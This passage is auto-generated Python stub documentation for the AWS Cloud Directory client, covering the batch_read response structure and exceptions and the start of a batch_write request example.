An object\xe2\x80\x99s identifier is immutable and no two objects will ever share the same object identifier\n/some/path - Identifies the object based on path\n#SomeBatchReference - Identifies the object in a batch call\n\n\n\n\nFilterAttributeRanges (list) --Provides range filters for multiple attributes. When providing ranges to typed link selection, any inexact ranges must be specified at the end. Any attributes that do not have a range specified are presumed to match the entire range.\n\n(dict) --Identifies the range of attributes that are used by a specified filter.\n\nAttributeName (string) --The unique name of the typed link attribute.\n\nRange (dict) -- [REQUIRED]The range of attribute values that are being selected.\n\nStartMode (string) -- [REQUIRED]The inclusive or exclusive range start.\n\nStartValue (dict) --The value to start the range at.\n\nStringValue (string) --A string data value.\n\nBinaryValue (bytes) --A binary data value.\n\nBooleanValue (boolean) --A Boolean data value.\n\nNumberValue (string) --A number data value.\n\nDatetimeValue (datetime) --A date and time value.\n\n\n\nEndMode (string) -- [REQUIRED]The inclusive or exclusive range end.\n\nEndValue (dict) --The attribute value to terminate the range at.\n\nStringValue (string) --A string data value.\n\nBinaryValue (bytes) --A binary data value.\n\nBooleanValue (boolean) --A Boolean data value.\n\nNumberValue (string) --A number data value.\n\nDatetimeValue (datetime) --A date and time value.\n\n\n\n\n\n\n\n\n\nFilterTypedLink (dict) --Filters are interpreted in the order of the attributes defined on the typed link facet, not the order they are supplied to any API calls.\n\nSchemaArn (string) -- [REQUIRED]The Amazon Resource Name (ARN) that is associated with the schema. 
For more information, see arns .\n\nTypedLinkName (string) -- [REQUIRED]The unique name of the typed link facet.\n\n\n\nNextToken (string) --The pagination token.\n\nMaxResults (integer) --The maximum number of results to retrieve.\n\n\n\nListIncomingTypedLinks (dict) --Returns a paginated list of all the incoming TypedLinkSpecifier information for an object. It also supports filtering by typed link facet and identity attributes. For more information, see Typed Links .\n\nObjectReference (dict) -- [REQUIRED]The reference that identifies the object whose attributes will be listed.\n\nSelector (string) --A path selector supports easy selection of an object by the parent/child links leading to it from the directory root. Use the link names from each parent/child link to construct the path. Path selectors start with a slash (/) and link names are separated by slashes. For more information about paths, see Access Objects . You can identify an object in one of the following ways:\n\n$ObjectIdentifier - An object identifier is an opaque string provided by Amazon Cloud Directory. When creating objects, the system will provide you with the identifier of the created object. An object\xe2\x80\x99s identifier is immutable and no two objects will ever share the same object identifier\n/some/path - Identifies the object based on path\n#SomeBatchReference - Identifies the object in a batch call\n\n\n\n\nFilterAttributeRanges (list) --Provides range filters for multiple attributes. When providing ranges to typed link selection, any inexact ranges must be specified at the end. 
Any attributes that do not have a range specified are presumed to match the entire range.\n\n(dict) --Identifies the range of attributes that are used by a specified filter.\n\nAttributeName (string) --The unique name of the typed link attribute.\n\nRange (dict) -- [REQUIRED]The range of attribute values that are being selected.\n\nStartMode (string) -- [REQUIRED]The inclusive or exclusive range start.\n\nStartValue (dict) --The value to start the range at.\n\nStringValue (string) --A string data value.\n\nBinaryValue (bytes) --A binary data value.\n\nBooleanValue (boolean) --A Boolean data value.\n\nNumberValue (string) --A number data value.\n\nDatetimeValue (datetime) --A date and time value.\n\n\n\nEndMode (string) -- [REQUIRED]The inclusive or exclusive range end.\n\nEndValue (dict) --The attribute value to terminate the range at.\n\nStringValue (string) --A string data value.\n\nBinaryValue (bytes) --A binary data value.\n\nBooleanValue (boolean) --A Boolean data value.\n\nNumberValue (string) --A number data value.\n\nDatetimeValue (datetime) --A date and time value.\n\n\n\n\n\n\n\n\n\nFilterTypedLink (dict) --Filters are interpreted in the order of the attributes on the typed link facet, not the order in which they are supplied to any API calls.\n\nSchemaArn (string) -- [REQUIRED]The Amazon Resource Name (ARN) that is associated with the schema. 
For more information, see arns .\n\nTypedLinkName (string) -- [REQUIRED]The unique name of the typed link facet.\n\n\n\nNextToken (string) --The pagination token.\n\nMaxResults (integer) --The maximum number of results to retrieve.\n\n\n\nGetLinkAttributes (dict) --Retrieves attributes that are associated with a typed link.\n\nTypedLinkSpecifier (dict) -- [REQUIRED]Allows a typed link specifier to be accepted as input.\n\nTypedLinkFacet (dict) -- [REQUIRED]Identifies the typed link facet that is associated with the typed link.\n\nSchemaArn (string) -- [REQUIRED]The Amazon Resource Name (ARN) that is associated with the schema. For more information, see arns .\n\nTypedLinkName (string) -- [REQUIRED]The unique name of the typed link facet.\n\n\n\nSourceObjectReference (dict) -- [REQUIRED]Identifies the source object that the typed link will attach to.\n\nSelector (string) --A path selector supports easy selection of an object by the parent/child links leading to it from the directory root. Use the link names from each parent/child link to construct the path. Path selectors start with a slash (/) and link names are separated by slashes. For more information about paths, see Access Objects . You can identify an object in one of the following ways:\n\n$ObjectIdentifier - An object identifier is an opaque string provided by Amazon Cloud Directory. When creating objects, the system will provide you with the identifier of the created object. An object\xe2\x80\x99s identifier is immutable and no two objects will ever share the same object identifier\n/some/path - Identifies the object based on path\n#SomeBatchReference - Identifies the object in a batch call\n\n\n\n\nTargetObjectReference (dict) -- [REQUIRED]Identifies the target object that the typed link will attach to.\n\nSelector (string) --A path selector supports easy selection of an object by the parent/child links leading to it from the directory root. 
Use the link names from each parent/child link to construct the path. Path selectors start with a slash (/) and link names are separated by slashes. For more information about paths, see Access Objects . You can identify an object in one of the following ways:\n\n$ObjectIdentifier - An object identifier is an opaque string provided by Amazon Cloud Directory. When creating objects, the system will provide you with the identifier of the created object. An object\xe2\x80\x99s identifier is immutable and no two objects will ever share the same object identifier\n/some/path - Identifies the object based on path\n#SomeBatchReference - Identifies the object in a batch call\n\n\n\n\nIdentityAttributeValues (list) -- [REQUIRED]Identifies the attribute value to update.\n\n(dict) --Identifies the attribute name and value for a typed link.\n\nAttributeName (string) -- [REQUIRED]The attribute name of the typed link.\n\nValue (dict) -- [REQUIRED]The value for the typed link.\n\nStringValue (string) --A string data value.\n\nBinaryValue (bytes) --A binary data value.\n\nBooleanValue (boolean) --A Boolean data value.\n\nNumberValue (string) --A number data value.\n\nDatetimeValue (datetime) --A date and time value.\n\n\n\n\n\n\n\n\n\nAttributeNames (list) -- [REQUIRED]A list of attribute names whose values will be retrieved.\n\n(string) --\n\n\n\n\n\n\n\n
:type ConsistencyLevel: string
:param ConsistencyLevel: Represents the manner and timing in which the successful write or update of an object is reflected in a subsequent read operation of that same object.
:rtype: dict
ReturnsResponse Syntax
{
'Responses': [
{
'SuccessfulResponse': {
'ListObjectAttributes': {
'Attributes': [
{
'Key': {
'SchemaArn': 'string',
'FacetName': 'string',
'Name': 'string'
},
'Value': {
'StringValue': 'string',
'BinaryValue': b'bytes',
'BooleanValue': True|False,
'NumberValue': 'string',
'DatetimeValue': datetime(2015, 1, 1)
}
},
],
'NextToken': 'string'
},
'ListObjectChildren': {
'Children': {
'string': 'string'
},
'NextToken': 'string'
},
'GetObjectInformation': {
'SchemaFacets': [
{
'SchemaArn': 'string',
'FacetName': 'string'
},
],
'ObjectIdentifier': 'string'
},
'GetObjectAttributes': {
'Attributes': [
{
'Key': {
'SchemaArn': 'string',
'FacetName': 'string',
'Name': 'string'
},
'Value': {
'StringValue': 'string',
'BinaryValue': b'bytes',
'BooleanValue': True|False,
'NumberValue': 'string',
'DatetimeValue': datetime(2015, 1, 1)
}
},
]
},
'ListAttachedIndices': {
'IndexAttachments': [
{
'IndexedAttributes': [
{
'Key': {
'SchemaArn': 'string',
'FacetName': 'string',
'Name': 'string'
},
'Value': {
'StringValue': 'string',
'BinaryValue': b'bytes',
'BooleanValue': True|False,
'NumberValue': 'string',
'DatetimeValue': datetime(2015, 1, 1)
}
},
],
'ObjectIdentifier': 'string'
},
],
'NextToken': 'string'
},
'ListObjectParentPaths': {
'PathToObjectIdentifiersList': [
{
'Path': 'string',
'ObjectIdentifiers': [
'string',
]
},
],
'NextToken': 'string'
},
'ListObjectPolicies': {
'AttachedPolicyIds': [
'string',
],
'NextToken': 'string'
},
'ListPolicyAttachments': {
'ObjectIdentifiers': [
'string',
],
'NextToken': 'string'
},
'LookupPolicy': {
'PolicyToPathList': [
{
'Path': 'string',
'Policies': [
{
'PolicyId': 'string',
'ObjectIdentifier': 'string',
'PolicyType': 'string'
},
]
},
],
'NextToken': 'string'
},
'ListIndex': {
'IndexAttachments': [
{
'IndexedAttributes': [
{
'Key': {
'SchemaArn': 'string',
'FacetName': 'string',
'Name': 'string'
},
'Value': {
'StringValue': 'string',
'BinaryValue': b'bytes',
'BooleanValue': True|False,
'NumberValue': 'string',
'DatetimeValue': datetime(2015, 1, 1)
}
},
],
'ObjectIdentifier': 'string'
},
],
'NextToken': 'string'
},
'ListOutgoingTypedLinks': {
'TypedLinkSpecifiers': [
{
'TypedLinkFacet': {
'SchemaArn': 'string',
'TypedLinkName': 'string'
},
'SourceObjectReference': {
'Selector': 'string'
},
'TargetObjectReference': {
'Selector': 'string'
},
'IdentityAttributeValues': [
{
'AttributeName': 'string',
'Value': {
'StringValue': 'string',
'BinaryValue': b'bytes',
'BooleanValue': True|False,
'NumberValue': 'string',
'DatetimeValue': datetime(2015, 1, 1)
}
},
]
},
],
'NextToken': 'string'
},
'ListIncomingTypedLinks': {
'LinkSpecifiers': [
{
'TypedLinkFacet': {
'SchemaArn': 'string',
'TypedLinkName': 'string'
},
'SourceObjectReference': {
'Selector': 'string'
},
'TargetObjectReference': {
'Selector': 'string'
},
'IdentityAttributeValues': [
{
'AttributeName': 'string',
'Value': {
'StringValue': 'string',
'BinaryValue': b'bytes',
'BooleanValue': True|False,
'NumberValue': 'string',
'DatetimeValue': datetime(2015, 1, 1)
}
},
]
},
],
'NextToken': 'string'
},
'GetLinkAttributes': {
'Attributes': [
{
'Key': {
'SchemaArn': 'string',
'FacetName': 'string',
'Name': 'string'
},
'Value': {
'StringValue': 'string',
'BinaryValue': b'bytes',
'BooleanValue': True|False,
'NumberValue': 'string',
'DatetimeValue': datetime(2015, 1, 1)
}
},
]
},
'ListObjectParents': {
'ParentLinks': [
{
'ObjectIdentifier': 'string',
'LinkName': 'string'
},
],
'NextToken': 'string'
}
},
'ExceptionResponse': {
'Type': 'ValidationException'|'InvalidArnException'|'ResourceNotFoundException'|'InvalidNextTokenException'|'AccessDeniedException'|'NotNodeException'|'FacetValidationException'|'CannotListParentOfRootException'|'NotIndexException'|'NotPolicyException'|'DirectoryNotEnabledException'|'LimitExceededException'|'InternalServiceException',
'Message': 'string'
}
},
]
}
Response Structure
(dict) --
Responses (list) --
A list of all the responses for each batch read.
(dict) --
Represents the output of a BatchRead response operation.
SuccessfulResponse (dict) --
Identifies which operation in a batch has succeeded.
ListObjectAttributes (dict) --
Lists all attributes that are associated with an object.
Attributes (list) --
The attributes map that is associated with the object. AttributeArn is the key; attribute value is the value.
(dict) --
The combination of an attribute key and an attribute value.
Key (dict) --
The key of the attribute.
SchemaArn (string) --
The Amazon Resource Name (ARN) of the schema that contains the facet and attribute.
FacetName (string) --
The name of the facet that the attribute exists within.
Name (string) --
The name of the attribute.
Value (dict) --
The value of the attribute.
StringValue (string) --
A string data value.
BinaryValue (bytes) --
A binary data value.
BooleanValue (boolean) --
A Boolean data value.
NumberValue (string) --
A number data value.
DatetimeValue (datetime) --
A date and time value.
NextToken (string) --
The pagination token.
ListObjectChildren (dict) --
Returns a paginated list of child objects that are associated with a given object.
Children (dict) --
The children structure, which is a map with the key as the LinkName and ObjectIdentifier as the value.
(string) --
(string) --
NextToken (string) --
The pagination token.
GetObjectInformation (dict) --
Retrieves metadata about an object.
SchemaFacets (list) --
The facets attached to the specified object.
(dict) --
A facet.
SchemaArn (string) --
The ARN of the schema that contains the facet with no minor component. See arns and In-Place Schema Upgrade for a description of when to provide minor versions.
FacetName (string) --
The name of the facet.
ObjectIdentifier (string) --
The ObjectIdentifier of the specified object.
GetObjectAttributes (dict) --
Retrieves attributes within a facet that are associated with an object.
Attributes (list) --
The attribute values that are associated with an object.
(dict) --
The combination of an attribute key and an attribute value.
Key (dict) --
The key of the attribute.
SchemaArn (string) --
The Amazon Resource Name (ARN) of the schema that contains the facet and attribute.
FacetName (string) --
The name of the facet that the attribute exists within.
Name (string) --
The name of the attribute.
Value (dict) --
The value of the attribute.
StringValue (string) --
A string data value.
BinaryValue (bytes) --
A binary data value.
BooleanValue (boolean) --
A Boolean data value.
NumberValue (string) --
A number data value.
DatetimeValue (datetime) --
A date and time value.
ListAttachedIndices (dict) --
Lists indices attached to an object.
IndexAttachments (list) --
The indices attached to the specified object.
(dict) --
Represents an index and an attached object.
IndexedAttributes (list) --
The indexed attribute values.
(dict) --
The combination of an attribute key and an attribute value.
Key (dict) --
The key of the attribute.
SchemaArn (string) --
The Amazon Resource Name (ARN) of the schema that contains the facet and attribute.
FacetName (string) --
The name of the facet that the attribute exists within.
Name (string) --
The name of the attribute.
Value (dict) --
The value of the attribute.
StringValue (string) --
A string data value.
BinaryValue (bytes) --
A binary data value.
BooleanValue (boolean) --
A Boolean data value.
NumberValue (string) --
A number data value.
DatetimeValue (datetime) --
A date and time value.
ObjectIdentifier (string) --
In response to ListIndex , the ObjectIdentifier of the object attached to the index. In response to ListAttachedIndices , the ObjectIdentifier of the index attached to the object. This field will always contain the ObjectIdentifier of the object on the opposite side of the attachment specified in the query.
NextToken (string) --
The pagination token.
ListObjectParentPaths (dict) --
Retrieves all available parent paths for any object type such as node, leaf node, policy node, and index node objects. For more information about objects, see Directory Structure .
PathToObjectIdentifiersList (list) --
Returns the path to the ObjectIdentifiers that are associated with the directory.
(dict) --
Returns the path to the ObjectIdentifiers that is associated with the directory.
Path (string) --
The path that is used to identify the object starting from directory root.
ObjectIdentifiers (list) --
Lists ObjectIdentifiers starting from directory root to the object in the request.
(string) --
NextToken (string) --
The pagination token.
ListObjectPolicies (dict) --
Returns policies attached to an object in pagination fashion.
AttachedPolicyIds (list) --
A list of policy ObjectIdentifiers , that are attached to the object.
(string) --
NextToken (string) --
The pagination token.
ListPolicyAttachments (dict) --
Returns all of the ObjectIdentifiers to which a given policy is attached.
ObjectIdentifiers (list) --
A list of ObjectIdentifiers to which the policy is attached.
(string) --
NextToken (string) --
The pagination token.
LookupPolicy (dict) --
Lists all policies from the root of the Directory to the object specified. If there are no policies present, an empty list is returned. If policies are present, and if some objects don\'t have the policies attached, it returns the ObjectIdentifier for such objects. If policies are present, it returns ObjectIdentifier , policyId , and policyType . Paths that don\'t lead to the root from the target object are ignored. For more information, see Policies .
PolicyToPathList (list) --
Provides list of path to policies. Policies contain PolicyId , ObjectIdentifier , and PolicyType . For more information, see Policies .
(dict) --
Used when a regular object exists in a Directory and you want to find all of the policies that are associated with that object and the parent to that object.
Path (string) --
The path that is referenced from the root.
Policies (list) --
List of policy objects.
(dict) --
Contains the PolicyType , PolicyId , and the ObjectIdentifier to which it is attached. For more information, see Policies .
PolicyId (string) --
The ID of PolicyAttachment .
ObjectIdentifier (string) --
The ObjectIdentifier that is associated with PolicyAttachment .
PolicyType (string) --
The type of policy that can be associated with PolicyAttachment .
NextToken (string) --
The pagination token.
ListIndex (dict) --
Lists objects attached to the specified index.
IndexAttachments (list) --
The objects and indexed values attached to the index.
(dict) --
Represents an index and an attached object.
IndexedAttributes (list) --
The indexed attribute values.
(dict) --
The combination of an attribute key and an attribute value.
Key (dict) --
The key of the attribute.
SchemaArn (string) --
The Amazon Resource Name (ARN) of the schema that contains the facet and attribute.
FacetName (string) --
The name of the facet that the attribute exists within.
Name (string) --
The name of the attribute.
Value (dict) --
The value of the attribute.
StringValue (string) --
A string data value.
BinaryValue (bytes) --
A binary data value.
BooleanValue (boolean) --
A Boolean data value.
NumberValue (string) --
A number data value.
DatetimeValue (datetime) --
A date and time value.
ObjectIdentifier (string) --
In response to ListIndex , the ObjectIdentifier of the object attached to the index. In response to ListAttachedIndices , the ObjectIdentifier of the index attached to the object. This field will always contain the ObjectIdentifier of the object on the opposite side of the attachment specified in the query.
NextToken (string) --
The pagination token.
ListOutgoingTypedLinks (dict) --
Returns a paginated list of all the outgoing TypedLinkSpecifier information for an object. It also supports filtering by typed link facet and identity attributes. For more information, see Typed Links .
TypedLinkSpecifiers (list) --
Returns a typed link specifier as output.
(dict) --
Contains all the information that is used to uniquely identify a typed link. The parameters discussed in this topic are used to uniquely specify the typed link being operated on. The AttachTypedLink API returns a typed link specifier while the DetachTypedLink API accepts one as input. Similarly, the ListIncomingTypedLinks and ListOutgoingTypedLinks API operations provide typed link specifiers as output. You can also construct a typed link specifier from scratch.
TypedLinkFacet (dict) --
Identifies the typed link facet that is associated with the typed link.
SchemaArn (string) --
The Amazon Resource Name (ARN) that is associated with the schema. For more information, see arns .
TypedLinkName (string) --
The unique name of the typed link facet.
SourceObjectReference (dict) --
Identifies the source object that the typed link will attach to.
Selector (string) --
A path selector supports easy selection of an object by the parent/child links leading to it from the directory root. Use the link names from each parent/child link to construct the path. Path selectors start with a slash (/) and link names are separated by slashes. For more information about paths, see Access Objects . You can identify an object in one of the following ways:
$ObjectIdentifier - An object identifier is an opaque string provided by Amazon Cloud Directory. When creating objects, the system will provide you with the identifier of the created object. An object's identifier is immutable and no two objects will ever share the same object identifier
/some/path - Identifies the object based on path
#SomeBatchReference - Identifies the object in a batch call
TargetObjectReference (dict) --
Identifies the target object that the typed link will attach to.
Selector (string) --
A path selector supports easy selection of an object by the parent/child links leading to it from the directory root. Use the link names from each parent/child link to construct the path. Path selectors start with a slash (/) and link names are separated by slashes. For more information about paths, see Access Objects . You can identify an object in one of the following ways:
$ObjectIdentifier - An object identifier is an opaque string provided by Amazon Cloud Directory. When creating objects, the system will provide you with the identifier of the created object. An object's identifier is immutable and no two objects will ever share the same object identifier
/some/path - Identifies the object based on path
#SomeBatchReference - Identifies the object in a batch call
IdentityAttributeValues (list) --
Identifies the attribute value to update.
(dict) --
Identifies the attribute name and value for a typed link.
AttributeName (string) --
The attribute name of the typed link.
Value (dict) --
The value for the typed link.
StringValue (string) --
A string data value.
BinaryValue (bytes) --
A binary data value.
BooleanValue (boolean) --
A Boolean data value.
NumberValue (string) --
A number data value.
DatetimeValue (datetime) --
A date and time value.
NextToken (string) --
The pagination token.
ListIncomingTypedLinks (dict) --
Returns a paginated list of all the incoming TypedLinkSpecifier information for an object. It also supports filtering by typed link facet and identity attributes. For more information, see Typed Links .
LinkSpecifiers (list) --
Returns one or more typed link specifiers as output.
(dict) --
Contains all the information that is used to uniquely identify a typed link. The parameters discussed in this topic are used to uniquely specify the typed link being operated on. The AttachTypedLink API returns a typed link specifier while the DetachTypedLink API accepts one as input. Similarly, the ListIncomingTypedLinks and ListOutgoingTypedLinks API operations provide typed link specifiers as output. You can also construct a typed link specifier from scratch.
TypedLinkFacet (dict) --
Identifies the typed link facet that is associated with the typed link.
SchemaArn (string) --
The Amazon Resource Name (ARN) that is associated with the schema. For more information, see arns .
TypedLinkName (string) --
The unique name of the typed link facet.
SourceObjectReference (dict) --
Identifies the source object that the typed link will attach to.
Selector (string) --
A path selector supports easy selection of an object by the parent/child links leading to it from the directory root. Use the link names from each parent/child link to construct the path. Path selectors start with a slash (/) and link names are separated by slashes. For more information about paths, see Access Objects . You can identify an object in one of the following ways:
$ObjectIdentifier - An object identifier is an opaque string provided by Amazon Cloud Directory. When creating objects, the system will provide you with the identifier of the created object. An object's identifier is immutable and no two objects will ever share the same object identifier
/some/path - Identifies the object based on path
#SomeBatchReference - Identifies the object in a batch call
TargetObjectReference (dict) --
Identifies the target object that the typed link will attach to.
Selector (string) --
A path selector supports easy selection of an object by the parent/child links leading to it from the directory root. Use the link names from each parent/child link to construct the path. Path selectors start with a slash (/) and link names are separated by slashes. For more information about paths, see Access Objects . You can identify an object in one of the following ways:
$ObjectIdentifier - An object identifier is an opaque string provided by Amazon Cloud Directory. When creating objects, the system will provide you with the identifier of the created object. An object's identifier is immutable and no two objects will ever share the same object identifier
/some/path - Identifies the object based on path
#SomeBatchReference - Identifies the object in a batch call
IdentityAttributeValues (list) --
Identifies the attribute value to update.
(dict) --
Identifies the attribute name and value for a typed link.
AttributeName (string) --
The attribute name of the typed link.
Value (dict) --
The value for the typed link.
StringValue (string) --
A string data value.
BinaryValue (bytes) --
A binary data value.
BooleanValue (boolean) --
A Boolean data value.
NumberValue (string) --
A number data value.
DatetimeValue (datetime) --
A date and time value.
NextToken (string) --
The pagination token.
GetLinkAttributes (dict) --
The list of attributes to retrieve from the typed link.
Attributes (list) --
The attributes that are associated with the typed link.
(dict) --
The combination of an attribute key and an attribute value.
Key (dict) --
The key of the attribute.
SchemaArn (string) --
The Amazon Resource Name (ARN) of the schema that contains the facet and attribute.
FacetName (string) --
The name of the facet that the attribute exists within.
Name (string) --
The name of the attribute.
Value (dict) --
The value of the attribute.
StringValue (string) --
A string data value.
BinaryValue (bytes) --
A binary data value.
BooleanValue (boolean) --
A Boolean data value.
NumberValue (string) --
A number data value.
DatetimeValue (datetime) --
A date and time value.
ListObjectParents (dict) --
ParentLinks (list) --
(dict) --
A pair of ObjectIdentifier and LinkName.
ObjectIdentifier (string) --
The ID that is associated with the object.
LinkName (string) --
The name of the link between the parent and the child object.
NextToken (string) --
ExceptionResponse (dict) --
Identifies which operation in a batch has failed.
Type (string) --
A type of exception, such as InvalidArnException .
Message (string) --
An exception message that is associated with the failure.
Exceptions
CloudDirectory.Client.exceptions.InternalServiceException
CloudDirectory.Client.exceptions.InvalidArnException
CloudDirectory.Client.exceptions.RetryableConflictException
CloudDirectory.Client.exceptions.ValidationException
CloudDirectory.Client.exceptions.LimitExceededException
CloudDirectory.Client.exceptions.AccessDeniedException
CloudDirectory.Client.exceptions.DirectoryNotEnabledException
:return: {
'Responses': [
{
'SuccessfulResponse': {
'ListObjectAttributes': {
'Attributes': [
{
'Key': {
'SchemaArn': 'string',
'FacetName': 'string',
'Name': 'string'
},
'Value': {
'StringValue': 'string',
'BinaryValue': b'bytes',
'BooleanValue': True|False,
'NumberValue': 'string',
'DatetimeValue': datetime(2015, 1, 1)
}
},
],
'NextToken': 'string'
},
'ListObjectChildren': {
'Children': {
'string': 'string'
},
'NextToken': 'string'
},
'GetObjectInformation': {
'SchemaFacets': [
{
'SchemaArn': 'string',
'FacetName': 'string'
},
],
'ObjectIdentifier': 'string'
},
'GetObjectAttributes': {
'Attributes': [
{
'Key': {
'SchemaArn': 'string',
'FacetName': 'string',
'Name': 'string'
},
'Value': {
'StringValue': 'string',
'BinaryValue': b'bytes',
'BooleanValue': True|False,
'NumberValue': 'string',
'DatetimeValue': datetime(2015, 1, 1)
}
},
]
},
'ListAttachedIndices': {
'IndexAttachments': [
{
'IndexedAttributes': [
{
'Key': {
'SchemaArn': 'string',
'FacetName': 'string',
'Name': 'string'
},
'Value': {
'StringValue': 'string',
'BinaryValue': b'bytes',
'BooleanValue': True|False,
'NumberValue': 'string',
'DatetimeValue': datetime(2015, 1, 1)
}
},
],
'ObjectIdentifier': 'string'
},
],
'NextToken': 'string'
},
'ListObjectParentPaths': {
'PathToObjectIdentifiersList': [
{
'Path': 'string',
'ObjectIdentifiers': [
'string',
]
},
],
'NextToken': 'string'
},
'ListObjectPolicies': {
'AttachedPolicyIds': [
'string',
],
'NextToken': 'string'
},
'ListPolicyAttachments': {
'ObjectIdentifiers': [
'string',
],
'NextToken': 'string'
},
'LookupPolicy': {
'PolicyToPathList': [
{
'Path': 'string',
'Policies': [
{
'PolicyId': 'string',
'ObjectIdentifier': 'string',
'PolicyType': 'string'
},
]
},
],
'NextToken': 'string'
},
'ListIndex': {
'IndexAttachments': [
{
'IndexedAttributes': [
{
'Key': {
'SchemaArn': 'string',
'FacetName': 'string',
'Name': 'string'
},
'Value': {
'StringValue': 'string',
'BinaryValue': b'bytes',
'BooleanValue': True|False,
'NumberValue': 'string',
'DatetimeValue': datetime(2015, 1, 1)
}
},
],
'ObjectIdentifier': 'string'
},
],
'NextToken': 'string'
},
'ListOutgoingTypedLinks': {
'TypedLinkSpecifiers': [
{
'TypedLinkFacet': {
'SchemaArn': 'string',
'TypedLinkName': 'string'
},
'SourceObjectReference': {
'Selector': 'string'
},
'TargetObjectReference': {
'Selector': 'string'
},
'IdentityAttributeValues': [
{
'AttributeName': 'string',
'Value': {
'StringValue': 'string',
'BinaryValue': b'bytes',
'BooleanValue': True|False,
'NumberValue': 'string',
'DatetimeValue': datetime(2015, 1, 1)
}
},
]
},
],
'NextToken': 'string'
},
'ListIncomingTypedLinks': {
'LinkSpecifiers': [
{
'TypedLinkFacet': {
'SchemaArn': 'string',
'TypedLinkName': 'string'
},
'SourceObjectReference': {
'Selector': 'string'
},
'TargetObjectReference': {
'Selector': 'string'
},
'IdentityAttributeValues': [
{
'AttributeName': 'string',
'Value': {
'StringValue': 'string',
'BinaryValue': b'bytes',
'BooleanValue': True|False,
'NumberValue': 'string',
'DatetimeValue': datetime(2015, 1, 1)
}
},
]
},
],
'NextToken': 'string'
},
'GetLinkAttributes': {
'Attributes': [
{
'Key': {
'SchemaArn': 'string',
'FacetName': 'string',
'Name': 'string'
},
'Value': {
'StringValue': 'string',
'BinaryValue': b'bytes',
'BooleanValue': True|False,
'NumberValue': 'string',
'DatetimeValue': datetime(2015, 1, 1)
}
},
]
},
'ListObjectParents': {
'ParentLinks': [
{
'ObjectIdentifier': 'string',
'LinkName': 'string'
},
],
'NextToken': 'string'
}
},
'ExceptionResponse': {
'Type': 'ValidationException'|'InvalidArnException'|'ResourceNotFoundException'|'InvalidNextTokenException'|'AccessDeniedException'|'NotNodeException'|'FacetValidationException'|'CannotListParentOfRootException'|'NotIndexException'|'NotPolicyException'|'DirectoryNotEnabledException'|'LimitExceededException'|'InternalServiceException',
'Message': 'string'
}
},
]
}
:returns:
(string) --
(string) --
"""
pass
def batch_write(DirectoryArn=None, Operations=None):
"""
Performs all the write operations in a batch. Either all the operations succeed or none.
See also: AWS API Documentation
Exceptions
:example: response = client.batch_write(
DirectoryArn='string',
Operations=[
{
'CreateObject': {
'SchemaFacet': [
{
'SchemaArn': 'string',
'FacetName': 'string'
},
],
'ObjectAttributeList': [
{
'Key': {
'SchemaArn': 'string',
'FacetName': 'string',
'Name': 'string'
},
'Value': {
'StringValue': 'string',
'BinaryValue': b'bytes',
'BooleanValue': True|False,
'NumberValue': 'string',
'DatetimeValue': datetime(2015, 1, 1)
}
},
],
'ParentReference': {
'Selector': 'string'
},
'LinkName': 'string',
'BatchReferenceName': 'string'
},
'AttachObject': {
'ParentReference': {
'Selector': 'string'
},
'ChildReference': {
'Selector': 'string'
},
'LinkName': 'string'
},
'DetachObject': {
'ParentReference': {
'Selector': 'string'
},
'LinkName': 'string',
'BatchReferenceName': 'string'
},
'UpdateObjectAttributes': {
'ObjectReference': {
'Selector': 'string'
},
'AttributeUpdates': [
{
'ObjectAttributeKey': {
'SchemaArn': 'string',
'FacetName': 'string',
'Name': 'string'
},
'ObjectAttributeAction': {
'ObjectAttributeActionType': 'CREATE_OR_UPDATE'|'DELETE',
'ObjectAttributeUpdateValue': {
'StringValue': 'string',
'BinaryValue': b'bytes',
'BooleanValue': True|False,
'NumberValue': 'string',
'DatetimeValue': datetime(2015, 1, 1)
}
}
},
]
},
'DeleteObject': {
'ObjectReference': {
'Selector': 'string'
}
},
'AddFacetToObject': {
'SchemaFacet': {
'SchemaArn': 'string',
'FacetName': 'string'
},
'ObjectAttributeList': [
{
'Key': {
'SchemaArn': 'string',
'FacetName': 'string',
'Name': 'string'
},
'Value': {
'StringValue': 'string',
'BinaryValue': b'bytes',
'BooleanValue': True|False,
'NumberValue': 'string',
'DatetimeValue': datetime(2015, 1, 1)
}
},
],
'ObjectReference': {
'Selector': 'string'
}
},
'RemoveFacetFromObject': {
'SchemaFacet': {
'SchemaArn': 'string',
'FacetName': 'string'
},
'ObjectReference': {
'Selector': 'string'
}
},
'AttachPolicy': {
'PolicyReference': {
'Selector': 'string'
},
'ObjectReference': {
'Selector': 'string'
}
},
'DetachPolicy': {
'PolicyReference': {
'Selector': 'string'
},
'ObjectReference': {
'Selector': 'string'
}
},
'CreateIndex': {
'OrderedIndexedAttributeList': [
{
'SchemaArn': 'string',
'FacetName': 'string',
'Name': 'string'
},
],
'IsUnique': True|False,
'ParentReference': {
'Selector': 'string'
},
'LinkName': 'string',
'BatchReferenceName': 'string'
},
'AttachToIndex': {
'IndexReference': {
'Selector': 'string'
},
'TargetReference': {
'Selector': 'string'
}
},
'DetachFromIndex': {
'IndexReference': {
'Selector': 'string'
},
'TargetReference': {
'Selector': 'string'
}
},
'AttachTypedLink': {
'SourceObjectReference': {
'Selector': 'string'
},
'TargetObjectReference': {
'Selector': 'string'
},
'TypedLinkFacet': {
'SchemaArn': 'string',
'TypedLinkName': 'string'
},
'Attributes': [
{
'AttributeName': 'string',
'Value': {
'StringValue': 'string',
'BinaryValue': b'bytes',
'BooleanValue': True|False,
'NumberValue': 'string',
'DatetimeValue': datetime(2015, 1, 1)
}
},
]
},
'DetachTypedLink': {
'TypedLinkSpecifier': {
'TypedLinkFacet': {
'SchemaArn': 'string',
'TypedLinkName': 'string'
},
'SourceObjectReference': {
'Selector': 'string'
},
'TargetObjectReference': {
'Selector': 'string'
},
'IdentityAttributeValues': [
{
'AttributeName': 'string',
'Value': {
'StringValue': 'string',
'BinaryValue': b'bytes',
'BooleanValue': True|False,
'NumberValue': 'string',
'DatetimeValue': datetime(2015, 1, 1)
}
},
]
}
},
'UpdateLinkAttributes': {
'TypedLinkSpecifier': {
'TypedLinkFacet': {
'SchemaArn': 'string',
'TypedLinkName': 'string'
},
'SourceObjectReference': {
'Selector': 'string'
},
'TargetObjectReference': {
'Selector': 'string'
},
'IdentityAttributeValues': [
{
'AttributeName': 'string',
'Value': {
'StringValue': 'string',
'BinaryValue': b'bytes',
'BooleanValue': True|False,
'NumberValue': 'string',
'DatetimeValue': datetime(2015, 1, 1)
}
},
]
},
'AttributeUpdates': [
{
'AttributeKey': {
'SchemaArn': 'string',
'FacetName': 'string',
'Name': 'string'
},
'AttributeAction': {
'AttributeActionType': 'CREATE_OR_UPDATE'|'DELETE',
